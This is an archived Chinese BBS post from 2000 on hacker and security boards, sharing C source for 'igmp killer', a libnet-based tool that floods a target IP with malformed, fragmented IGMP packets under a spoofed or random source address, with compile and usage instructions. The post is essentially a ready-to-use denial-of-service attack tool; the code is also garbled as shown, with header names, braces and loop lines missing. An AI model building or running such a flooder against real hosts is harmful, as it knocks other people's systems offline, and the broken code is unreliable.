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发信人: bstone (Less time in bbs), 信区: Hacker
标  题: igmp killer one program for i386/Linux using libn
发信站: BBS 荔园晨风站 (Sun Aug  6 19:44:29 2000), 转信

发信人: scz (小四), 信区: Security
标  题: igmp killer one program for i386/Linux using libn
发信站: 武汉白云黄鹤站 (Fri Aug  4 14:38:18 2000), 站内信件

 * Complie: gcc -O3 -o igmpki igmpkilleri.c `libnet-config --defines --cflags`
`libnet-config --libs`
 * Usage  : ./igmpki --si --di --num 200
 * Date   : 2000-08-03 22:57

 *                                                                 *
 *                            头文件                               *
 *                                                                 *

#define _GNU_SOURCE

#include     /* 使用time()产生随机化种子     */
#include   /* 使用getopt()长选项支持       */
#include   /* 使用libnet必须包含这个头文件 */

 *                                                                 *
 *                            宏定义                               *
 *                                                                 *

#define SUCCESS            0
#define FAILURE           -1
#define DEFAULTIGMPNUMBER  200   /* 缺省发送IGMP报文数目 */
#define IPDATALEN          1480  /* 异常负载长度         */

 *                                                                 *
 *                            全局变量                             *
 *                                                                 *

/* 用于初始化伪随机数发生器 */
u_long randomState[64] =
0x00000003, 0x32d9c024, 0x9b663182, 0x5da1f342, 0x7449e56b, 0xbeb1dbb0,
0xab5c5918, 0x946554fd,
0x8c2e680f, 0xeb3d799f, 0xb11ee0b7, 0x2d436b86, 0xda672e2a, 0x1588ca88,
0xe369735d, 0x904f35f7,
0xd7158fd6, 0x6fa6f051, 0x616e6b96, 0xac94efdc, 0xde3b81e0, 0xdf0a6fb5,
0xf103bc02, 0x48f340fb,
0x36413f93, 0xc622c298, 0xf5a42ab8, 0x8a88d77b, 0xf5ad9d0e, 0x8999220b,
0x27fb47b9, 0x9a319039,
0x94102000, 0x9610000a, 0xc60a0000, 0x90022001, 0x8408e07f, 0x8528800a,
0x8088e080, 0x02800004,
0x9612c002, 0x10bffff9, 0x9402a007, 0x81c3e008, 0xd6224000, 0x86102000,
0x94100003, 0xd60a0000,
0x90022001, 0x840ae07f, 0x85288003, 0x94128002, 0x808ae080, 0x12bffffa,
0x8600e007, 0x80a0e01f,
0x18800006, 0x808ae040, 0x02800004, 0x84103fff, 0x85288003, 0x94128002,
0x81c3e008, 0xd4224000
u_char * packet      = NULL;
size_t   packet_size = LIBNET_IP_H + IPDATALEN;
int      rawSocket;

 *                                                                 *
 *                            函数原型                             *
 *                                                                 *

void Libnet_do_checksum ( u_char * buf, int protocol, int len );
void Libnet_init_packet ( size_t p_size, u_char ** buf );
int  Libnet_open_raw_sock ( int protocol );
void Libnet_write_ip ( int sock, u_char * packet, int len );
void igmpSend ( u_long srcIp, u_long dstIp );
void usage ( char * arg );


void Libnet_do_checksum ( u_char * buf, int protocol, int len )
    if ( libnet_do_checksum( buf, protocol, len ) == -1 )
        libnet_error( LIBNET_ERR_FATAL, "libnet_do_checksum failed\n" );
}  /* end of Libnet_do_checksum */

void Libnet_init_packet ( size_t p_size, u_char ** buf )
    if ( libnet_init_packet( p_size, buf ) == -1 )
        libnet_error( LIBNET_ERR_FATAL, "Can't initialize packet\n" );
}  /* end of Libnet_init_packet */

int Libnet_open_raw_sock ( int protocol )
    int s;
    if ( ( s = libnet_open_raw_sock( protocol ) ) == -1 )
        libnet_error( LIBNET_ERR_FATAL, "Can't open raw socket %08x\n",
protocol );
    return( s );
}  /* end of Libnet_open_raw_sock */

void Libnet_write_ip ( int sock, u_char * packet, int len )
    int w;
    if ( ( w = libnet_write_ip( sock, packet, len ) ) < len )
        libnet_error( LIBNET_ERR_WARNING, "libnet_write_ip only wrote %d
bytes\n", w );
}  /* end of Libnet_write_ip */

void igmpSend ( u_long srcIp, u_long dstIp )
    u_short ipDataLen;
    u_short frag;
    u_short bit;

    bit       = 0;
    ipDataLen = 200;  /* 200字节的负载,总共15000字节的负载 */
    frag      = 1850;
        /* 构造IP头 */
        libnet_build_ip( ipDataLen,       /* IP数据区长度 */
                         IPTOS_LOWDELAY,  /* IP tos       */
                         19774,           /* IP ID        */
                         frag | bit,      /* frag stuff   */
                         255,             /* TTL          */
                         IPPROTO_IGMP,    /* 上层协议     */
                         srcIp,           /* big-endian序 */
                         dstIp,           /* 目标IP       */
                         NULL,            /* 无选项       */
                         0,               /* 选项长度零   */
                         packet );        /* 指向IP头     */
        Libnet_write_ip( rawSocket, packet, LIBNET_IP_H + ipDataLen );
        if ( frag == 0 )
        ipDataLen = IPDATALEN;
        bit       = 0x2000;  /* 非最后分片 */
        frag     -= 185;
    } while ( 1 );  /* 总共11个分片发送出去 */
}  /* end of igmpSend */

void usage ( char * arg )
    fprintf( stderr, " Usage: %s [--si srcIp] [--di dstIp] [--num igmpNumber]
\n", arg );
    exit( FAILURE );
}  /* end of usage */

int main ( int argc, char * argv[] )


    /* 定义长选项 */
    static struct option longOption[] =
        { "si",  1, 0, LONGOPTIONCHAR },  /* 源IP           */
        { "di",  1, 0, LONGOPTIONCHAR },  /* 攻击目标IP     */
        { "num", 1, 0, LONGOPTIONCHAR },  /* IGMP报文数目   */
        { 0, 0, 0, 0 }
    int          longOptionIndex      = 0;  /* 用于处理长选项 */
    /* IP使用使用网络字节序指定 */
    u_long       srcIp                = 0xffffffff;         /* 伪造的源IP   */
    u_long       dstIp                = 0xffffffff;         /* 目标IP       */
    u_long       igmpNumber           = DEFAULTIGMPNUMBER;  /* IGMP报文数目 */
    unsigned int randomSeed           = ( unsigned int )time( NULL );
    int          c, i;

    if ( argc == 1 )
        usage( argv[0] );
    initstate( randomSeed, ( char * )randomState, 128 );
    setstate( ( char * )randomState );
    opterr = 0;  /* don't want getopt() writing to stderr */
    while ( ( c = getopt_long( argc, argv, "h", longOption, &longOptionIndex  )
) != EOF )
        switch ( c )
        case LONGOPTIONCHAR:  /* 处理长选项 */
            fprintf( stderr, "option %s", longOption[ longOptionIndex ].name );
            if ( optarg )
                fprintf( stderr, " with arg %s", optarg );
            fprintf( stderr, "\n" );
            if ( optarg )
                switch ( longOptionIndex )
                case 0:
                    /* 返回值是big-endian序 */
                    srcIp = libnet_name_resolve( optarg, LIBNET_DONT_RESOLVE );
                    if ( srcIp == -1 )
                        libnet_error( LIBNET_ERR_FATAL, "Bad srcIp: %s\n",
optarg );
                case 1:
                    /* 返回值是big-endian序 */
                    dstIp = libnet_name_resolve( optarg, LIBNET_DONT_RESOLVE );
                    if ( dstIp == -1 )
                        libnet_error( LIBNET_ERR_FATAL, "Bad dstIp: %s\n",
optarg );
                case 2:  /* 采用10进制 */
                    igmpNumber   = ( u_long )strtoul( optarg, NULL, 10 );
                    if ( igmpNumber == 0 )
                        fprintf( stderr, "Check your igmpNumber\n" );
                        exit( FAILURE );
                }  /* end of switch */
        case 'h':
        case '?':
            usage( argv[0] );
        }  /* end of switch */
    }  /* end of while */
    if ( dstIp == 0xffffffff )
        fprintf( stderr, "Check your dstIp\n" );
        exit( FAILURE );
    /* 如果未指定srcIp,随机化 */
    if ( srcIp == -1 )
        srcIp = ( u_long )random();
    fprintf( stderr, "[ Igmp sending ... ... ]\n" );
    /* 分配内存并初始化成零 */
    Libnet_init_packet( packet_size, &packet );
    /* 创建raw_socket */
    rawSocket = Libnet_open_raw_sock( IPPROTO_RAW );
    for ( i = 0; i < igmpNumber; i++ )
        igmpSend( srcIp, dstIp );
    /* 关闭raw_socket */
    libnet_close_raw_sock( rawSocket );
    /* 释放由libnet_init_packet()分配的内存 */
    libnet_destroy_packet( &packet );
    fprintf( stderr, "\n[ Igmp send finished ]\n" );
    return( SUCCESS );
}  /* end of main */




※ 来源:.武汉白云黄鹤站 bbs.whnet.edu.cn.[FROM: bbs.szptt.net.cn]


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☆ 来源:.BBS 荔园晨风站 bbs.szu.edu.cn.[FROM: bbs@]

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